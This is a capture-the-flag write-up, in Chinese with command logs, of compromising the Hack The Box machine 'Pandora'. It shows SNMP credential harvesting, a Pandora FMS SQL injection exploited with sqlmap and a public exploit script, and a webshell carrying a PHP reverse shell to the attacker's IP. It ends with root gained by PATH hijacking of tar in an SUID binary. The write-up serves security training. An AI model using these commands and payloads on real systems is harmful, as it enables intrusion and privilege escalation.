Pandora - HackMD

--- title: 'Pandora' disqus: hackmd tags: HTB --- Pandora === [TOC] # Overall ## Used Skill - nmap UDP scan - webshell - exploit suid file - hijack command ## Rating - ⭐⭐⭐⭐⭐☆☆☆☆☆ # Recon ## nmap - 80 port 上只有一個看起來是靜態頁面的東西，footer 有個看似 Host name 的 `panda.htb` ``` ~$ sudo nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.136 [sudo] password for eethan1: Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-28 14:22 CST Stats: 0:00:07 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 41.31% done; ETC: 14:23 (0:00:09 remaining) Stats: 0:00:49 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute Traceroute Timing: About 32.26% done; ETC: 14:23 (0:00:00 remaining) Nmap scan report for 10.10.11.136 Host is up (0.41s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA) | 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA) |_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Play | Landing |_http-server-header: Apache/2.4.41 (Ubuntu) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.92%E=4%D=3/28%OT=22%CT=1%CU=38457%PV=Y%DS=2%DC=T%G=Y%TM=6241548 OS:3%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OPS OS:(O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST1 OS:1NW7%O6=M505ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN OS:(R=Y%DF=Y%T=40%W=FAF0%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N% OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD OS:=S) Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 995/tcp) HOP RTT ADDRESS 1 411.40 ms 10.10.14.1 2 411.19 ms 10.10.11.136 ``` - 改作 UDP 掃描，找到 snmp 服務 ``` ~$ sudo nmap -sU -top-ports=30 panda.htb Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-28 14:50 CST Nmap scan report for panda.htb (10.10.11.136) Host is up (0.41s latency). Not shown: 28 closed udp ports (port-unreach) PORT STATE SERVICE 68/udp open|filtered dhcpc 161/udp open snmp ``` ## sqlmap ![](https://hackmd.io/_uploads/HyVKFRAf5.png =300x300) - 首頁有個可以送訊息的表格，填完後發 GET `http://panda.htb/?fullName=q&email=q%40e&phone=q&message=q`，試著 sqlmap `sqlmap -u http://10.10.11.136/\?fullName\=%27\&email\=%27%40q\&phone\=%27\&message\=%27` 沒掃出東西 ## path brute - 試著掃描子路徑 `gobuster dir -u http://10.10.11.136 -w ~/Documents/wordlists/rockyou.txt` 沒什麼東西 # Get Shell - `snmpwalk -v 1 -c public 10.10.11.136 > snmp.txt` 找到一組username `daniel` 和 password `HotelBabylon23` ![](https://hackmd.io/_uploads/B188v11Q9.png) - ssh 登入後，發現 flag 在另一個 user 底下 ``` daniel@pandora:~$ find / -name "user.txt" 2> /dev/null /home/matt/user.txt ``` - 查看 apache 設定，找到 pandora.panda.htb ![](https://hackmd.io/_uploads/rksiFyymq.png) - 本機戳 `pandora.panda.htb` 不會到正確的 virtual host，要在 box 裡戳(不知道為啥) - 掛代理 `ssh -D 8080 daniel@panda.htb` - 本地看是一個 pandora fms 服務，參考 [Pandora FMS 742: Critical Code Vulnerabilities Explained](https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained)，有 SQLI 可利用 ``` $ proxychains sqlmap -u http://pandora.panda.htb/pandora_console/include/chart_generator.php\?session_id\=a -D pandora -T tsessions_php --dump ... | eteshmpp2shihhj56vgn02jh54 | NULL | 1648459740 | | f0qisbrojp785v1dmm8cu1vkaj | id_usuario|s:6:"daniel"; | 1641200284 | | f609b4t5s8qvv9leh4l9m8opf1 | NULL | 1648459733 | | fgrsvg6mpb4qe2pifr5knpq8bk | NULL | 1648459629 | | fikt9p6i78no7aofn74rr71m85 | NULL | 1638786504 | | fqd96rcv4ecuqs409n5qsleufi | NULL | 1638786762 | | g0kteepqaj1oep6u7msp0u38kv | id_usuario|s:6:"daniel"; | 1638783230 | | g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0; | 1638796349 | | gf40pukfdinc63nm5lkroidde6 | NULL | 1638786349 | ``` - 手動拿 session 變成 matt 還不夠，另一個 [exploit](https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated/blob/master/sqlpwn.py) 透過 SQLI 寫 admin session ``` # 要在 /etc/hosts 把 pandora.panda.htb 設 127.0.0.1 tmp$ proxychains python sqlpwn.py -t pandora.panda.htb [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.14 URL: http://pandora.panda.htb/pandora_console [+] Sending Injection Payload [proxychains] Strict chain ... 127.0.0.1:8080 ... 127.0.0.1:80 ... OK [+] Requesting Session [+] Admin Session Cookie : 1apq13c1m2t5oiie253scsm2ur [+] Sending Payload [proxychains] Strict chain ... 127.0.0.1:8080 ... 127.0.0.1:80 ... OK [+] Respose : 200 [+] Pwned :) [+] If you want manual Control : http://pandora.panda.htb/pandora_console/images/pwn.php?test= CMD > ``` - 這個 exploit 基本上還是 webshell ，但不知道為啥彈不了 shell，後來翻 code 找到 webshell 位置用瀏覽器開就能彈了，因為 cmd 的部分是直接拼接，可能urlencode沒處理好 `http://pandora.panda.htb/pandora_console/images/pwn.php?test=php%20-r%20%27%24sock%3Dfsockopen(%2210.10.14.30%22%2C%2031596%20)%3Bexec(%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22)%3B%27` # Privilege Escalation - 找 suid file ，拿到正常的 shell ``` tmp$ nc -nvlp 31596 Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::31596 Ncat: Listening on 0.0.0.0:31596 Ncat: Connection from 10.10.11.136. Ncat: Connection from 10.10.11.136:46924. /bin/sh: 0: can't access tty; job control turned off $ python3 -c 'import pty;pty.spawn("/bin/bash")' matt@pandora:/var/www/pandora/pandora_console/images$ find / -perm -u=s -type f 2>/dev/null <nsole/images$ find / -perm -u=s -type f 2>/dev/null /usr/bin/sudo /usr/bin/pkexec /usr/bin/chfn /usr/bin/newgrp /usr/bin/gpasswd /usr/bin/umount /usr/bin/pandora_backup /usr/bin/passwd /usr/bin/mount /usr/bin/su /usr/bin/at /usr/bin/fusermount /usr/bin/chsh /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/eject/dmcrypt-get-device /usr/lib/policykit-1/polkit-agent-helper-1 # 此時 shell 是受限的 matt@pandora:/var/www/pandora/pandora_console/images$ echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null <(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null warning: commands will be executed using /bin/sh job 8 at Mon Mar 28 14:19:00 2022 /bin/sh: 0: can't access tty; job control turned off $ python3 -c 'import pty;pty.spawn("/bin/bash")' python3 -c 'import pty;pty.spawn("/bin/bash")' matt@pandora:/var/www/pandora/pandora_console/images$ ``` - pandora_backup 是一個 binary 檔案，直接跑看起來在備份，用 `ltrace` 看他跑了什麼 ``` matt@pandora:/var/www/pandora/pandora_console/images$ ltrace pandora_backup ltrace pandora_backup getuid() = 1000 geteuid() = 1000 setreuid(1000, 1000) = 0 puts("PandoraFMS Backup Utility"PandoraFMS Backup Utility ) = 26 puts("Now attempting to backup Pandora"...Now attempting to backup PandoraFMS client ) = 43 system("tar -cvf /root/.backup/pandora-b"...tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied tar: Error is not recoverable: exiting now <no return ...> --- SIGCHLD (Child exited) --- <... system resumed> ) = 512 puts("Backup failed!\nCheck your permis"...Backup failed! Check your permissions! ) = 39 +++ exited (status 1) +++ ``` - 有個 tar 指令可以劫持，成功拿 root ``` matt@pandora:/tmp$ echo "/bin/bash" > tar echo "/bin/bash" > tar matt@pandora:/tmp$ chmod 777 tar chmod 777 tar matt@pandora:/tmp$ PATH=.:$PATH PATH=.:$PATH matt@pandora:/tmp$ pandora_backup pandora_backup PandoraFMS Backup Utility Now attempting to backup PandoraFMS client root@pandora:/tmp# ```